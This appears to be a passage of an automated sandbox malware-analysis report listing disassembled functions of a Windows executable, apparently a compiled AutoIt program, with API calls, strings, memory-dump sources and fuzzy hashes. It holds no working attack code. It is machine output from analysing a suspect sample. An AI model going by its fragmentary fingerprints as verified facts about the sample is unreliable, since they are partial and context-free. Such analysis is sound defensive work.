                                                                              • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                              • String ID: ($,$tooltips_class32
                                                                              • API String ID: 541082891-3320066284
                                                                              • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                              • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                              • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                              • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                              Function 00454DAA Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 203windowlibraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00454DCF
                                                                              • _wcslen.LIBCMT ref: 00454DE2
                                                                              • __wcsicoll.LIBCMT ref: 00454DEF
                                                                              • _wcslen.LIBCMT ref: 00454E04
                                                                              • __wcsicoll.LIBCMT ref: 00454E11
                                                                              • _wcslen.LIBCMT ref: 00454E24
                                                                              • __wcsicoll.LIBCMT ref: 00454E31
                                                                                • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                              • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                              • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                              • DestroyIcon.USER32(?), ref: 00454FA2
                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                              • String ID: .dll$.exe$.icl
                                                                              • API String ID: 2511167534-1154884017
                                                                              • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                              • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                              • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                              • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                              Function 00436B3A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                              • _wcslen.LIBCMT ref: 00436B79
                                                                              • _wcscpy.LIBCMT ref: 00436B9F
                                                                              • _wcscat.LIBCMT ref: 00436BC0
                                                                              • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                              • _wcscat.LIBCMT ref: 00436C2A
                                                                              • _wcscat.LIBCMT ref: 00436C31
                                                                              • __wcsicoll.LIBCMT ref: 00436C4B
                                                                              • _wcsncpy.LIBCMT ref: 00436C62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                              • API String ID: 1503153545-1459072770
                                                                              • Opcode ID: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                                                                              • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                              • Opcode Fuzzy Hash: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                                                                              • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                              Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                              • _fseek.LIBCMT ref: 004527FC
                                                                              • __wsplitpath.LIBCMT ref: 0045285C
                                                                              • _wcscpy.LIBCMT ref: 00452871
                                                                              • _wcscat.LIBCMT ref: 00452886
                                                                              • __wsplitpath.LIBCMT ref: 004528B0
                                                                              • _wcscat.LIBCMT ref: 004528C8
                                                                              • _wcscat.LIBCMT ref: 004528DD
                                                                              • __fread_nolock.LIBCMT ref: 00452914
                                                                              • __fread_nolock.LIBCMT ref: 00452925
                                                                              • __fread_nolock.LIBCMT ref: 00452944
                                                                              • __fread_nolock.LIBCMT ref: 00452955
                                                                              • __fread_nolock.LIBCMT ref: 00452976
                                                                              • __fread_nolock.LIBCMT ref: 00452987
                                                                              • __fread_nolock.LIBCMT ref: 00452998
                                                                              • __fread_nolock.LIBCMT ref: 004529A9
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                              • __fread_nolock.LIBCMT ref: 00452A39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                              • String ID:
                                                                              • API String ID: 2054058615-0
                                                                              • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                              • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                              • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                              • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                              Function 004559A8 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 401COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              • Opcode ID: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
                                                                              • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                              • Opcode Fuzzy Hash: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
                                                                              • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                              Function 004700B0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                              • GetClientRect.USER32(?,?), ref: 004701FA
                                                                              • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                              • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                              • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                              • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                              • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                              • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                              • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                              • GetClientRect.USER32(?,?), ref: 00470371
                                                                              • GetStockObject.GDI32(00000011), ref: 00470391
                                                                              • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                              • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 867697134-248962490
                                                                              • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                              • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                              • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                              • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                              Function 00448759 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window
                                                                              • String ID: 0
                                                                              • API String ID: 2353593579-4108050209
                                                                              • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                              • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                              • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                              • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                              Function 0044A0EA Relevance: 31.7, APIs: 21, Instructions: 196windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32 ref: 0044A11D
                                                                              • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                              • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                              • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                              • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                              • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                              • GetWindowDC.USER32 ref: 0044A277
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                              • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                              • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                              • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                              • String ID:
                                                                              • API String ID: 1744303182-0
                                                                              • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                              • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                              • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                              • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                              Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$__wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 790654849-1810252412
                                                                              • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                              • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                              • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                              • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                              Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: InitVariant
                                                                              • String ID:
                                                                              • API String ID: 1927566239-0
                                                                              • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                              • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                              • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                              • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                              Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                              • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                              • IsWindow.USER32(?), ref: 0046DBDE
                                                                              • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                              • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                              • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                              • API String ID: 1322021666-1919597938
                                                                              • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                              • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                              • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                              • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                              Function 0045DE12 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                              • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                              • __wsplitpath.LIBCMT ref: 0045DF54
                                                                              • _wcscat.LIBCMT ref: 0045DF6C
                                                                              • _wcscat.LIBCMT ref: 0045DF7E
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                              • _wcscpy.LIBCMT ref: 0045E019
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                              • String ID: *.*
                                                                              • API String ID: 3201719729-438819550
                                                                              • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                              • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                              • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                              • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                              Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2485277191-404129466
                                                                              • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                              • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                              • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                              • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                              Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                              • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                              • strncnt.LIBCMT ref: 00428646
                                                                              • strncnt.LIBCMT ref: 0042865A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
